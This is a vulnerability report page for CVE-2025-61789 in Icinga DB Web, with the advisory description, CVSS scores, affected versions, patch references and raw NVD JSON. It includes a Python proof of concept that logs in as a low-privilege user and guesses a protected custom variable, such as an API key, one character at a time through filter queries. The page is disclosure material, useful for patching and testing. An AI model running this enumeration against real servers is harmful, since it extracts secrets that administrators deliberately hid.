Security Vulnerability Report
CVE-2025-61789 CVSS 5.3 MEDIUM

CVE-2025-61789

Published: 2025-10-16 17:15:35
Last Modified: 2025-12-11 18:24:46

Description

Icinga DB Web provides a graphical interface for Icinga monitoring. Before 1.1.4 and 1.2.3, an authorized user with access to Icinga DB Web can reference a custom variable that is either protected by icingadb/protect/variables or hidden by icingadb/denylist/variables in a filter and guess the values assigned to it: the filter is still evaluated against the real value, so whether the result set is empty or not reveals whether a guess matched (NVD classifies the weakness as CWE-204, Observable Response Discrepancy). Versions 1.1.4 and 1.2.3 respond with an error if such a custom variable is used in a filter.

CVSS Details

CVSS Score (secondary metric, from the advisory)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
NVD Primary Metric
The NVD primary assessment differs only in attack complexity (Low instead of High): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, base score 6.5 (MEDIUM). Both agree on the impact: confidentiality High, integrity and availability None, no user interaction, low privileges (an authorized Icinga DB Web user) required.
Weakness
CWE-204 (Observable Response Discrepancy)

Configurations (Affected Products)

cpe:2.3:a:icinga:icinga_db_web:*:*:*:*:*:*:*:* (Icinga DB Web < 1.1.4) - VULNERABLE
cpe:2.3:a:icinga:icinga_db_web:*:*:*:*:*:*:*:* (Icinga DB Web 1.2.0 - 1.2.2) - VULNERABLE
Fixed in Icinga DB Web 1.1.4 and 1.2.3.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61789 PoC - Icinga DB Web Protected Variable Information Disclosure
# This PoC demonstrates how an authorized user can guess values of protected
# custom variables through filter-based blind information disclosure.
#
# Request details (list route, filter syntax, JSON export, CSRF token field)
# follow Icinga Web 2 / Icinga DB Web conventions as understood by the editor
# and are not taken from the vendor advisory; verify them against a lab
# instance before relying on them.

import re
from urllib.parse import quote

import requests

# Configuration
TARGET_URL = "https://icinga-db-web.example.com"
USERNAME = "low_priv_user"
PASSWORD = "user_password"
PROTECTED_VAR = "secret_api_key"        # The protected custom variable name
TARGET_OBJECT = "hostname.example.com"  # Target host to query

# Characters tried at each position. '*' is deliberately absent: it is the
# wildcard in Icinga Web filter syntax, so a literal '*' in the value cannot
# be told apart from the wildcard by this oracle.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_-{}@!#$%^&"
MAX_LENGTH = 50  # Max length assumption


def login(session):
    """Step 1: Authenticate to Icinga DB Web through the Icinga Web 2 login form.

    The form carries a CSRF token; it is read from the login page and posted
    back together with the credentials (token field name is an assumption).
    """
    page = session.get(f"{TARGET_URL}/authentication/login")
    match = re.search(r'name="CSRFToken"\s+value="([^"]+)"', page.text)
    login_data = {"username": USERNAME, "password": PASSWORD}
    if match:
        login_data["CSRFToken"] = match.group(1)
    response = session.post(f"{TARGET_URL}/authentication/login", data=login_data)
    response.raise_for_status()


def check_filter_value(session, pattern):
    """Step 2: Query the host list with a filter on the protected variable.

    In Icinga Web filter syntax the query string is the filter: '&' joins
    conditions, '=' compares and '*' is a wildcard. In vulnerable versions the
    result set is non-empty only when the pattern matches the real value, so
    the response reveals whether the guess is right. Fixed versions (1.1.4 /
    1.2.3) answer with an error instead, which is reported here as None.
    """
    query = (
        f"host.name={quote(TARGET_OBJECT, safe='')}"
        f"&host.vars.{PROTECTED_VAR}={quote(pattern, safe='*')}"
        "&format=json"
    )
    response = session.get(f"{TARGET_URL}/icingadb/hosts?{query}")
    if response.status_code != 200:
        return None
    return response.json()


def matched(result):
    """True if the list response contains at least one host row."""
    if result is None:
        return False
    if isinstance(result, dict):
        return len(result.get("results", [])) > 0
    return len(result) > 0


def enumerate_variable(session):
    """Step 3: Blind, prefix-based enumeration of the protected variable.

    Each round extends the known prefix by one character using a
    '<prefix><char>*' wildcard match. When no character extends the prefix,
    an exact (wildcard-free) match confirms the full value.
    """
    discovered = ""
    for _ in range(MAX_LENGTH):
        for char in CHARSET:
            if matched(check_filter_value(session, discovered + char + "*")):
                discovered += char
                print(f"Discovered so far: {discovered}")
                break
        else:
            break  # no character extends the prefix
    if matched(check_filter_value(session, discovered)):
        return discovered
    # Value is longer than MAX_LENGTH, uses characters outside CHARSET,
    # or the server rejected the filter (fixed version).
    return None


# Note: In fixed versions (1.1.4 / 1.2.3), the server returns an error
# when protected variables are used in filters, preventing this attack.
if __name__ == "__main__":
    print("CVE-2025-61789 PoC - Protected Variable Information Disclosure")
    print(f"Target: {TARGET_URL}")
    print(f"Protected Variable: {PROTECTED_VAR}")
    # session = requests.Session()
    # login(session)
    # value = enumerate_variable(session)
    # print(f"Discovered value: {value}")

References

https://github.com/Icinga/icingadb-web/security/advisories/GHSA-w57j-28jc-8429 (Vendor Advisory, Patch)
https://github.com/Icinga/icingadb-web/commit/5e982dad40ec379075307ab1693580138e675b18 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61789", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:34.590", "lastModified": "2025-12-11T18:24:46.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Icinga DB Web provides a graphical interface for Icinga monitoring. Before 1.1.4 and 1.2.3, an authorized user with access to Icinga DB Web, can use a custom variable in a filter that is either protected by icingadb/protect/variables or hidden by icingadb/denylist/variables, to guess values assigned to it. Versions 1.1.4 and 1.2.3 respond with an error if such a custom variable is used."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga_db_web:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.4", "matchCriteriaId": "E2B379CF-663D-4407-A826-8996CD761C10"}, {"vulnerable": true, 
"criteria": "cpe:2.3:a:icinga:icinga_db_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "1.2.3", "matchCriteriaId": "B58B59D2-206D-40B0-823F-E0DFACE93056"}]}]}], "references": [{"url": "https://github.com/Icinga/icingadb-web/commit/5e982dad40ec379075307ab1693580138e675b18", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Icinga/icingadb-web/security/advisories/GHSA-w57j-28jc-8429", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}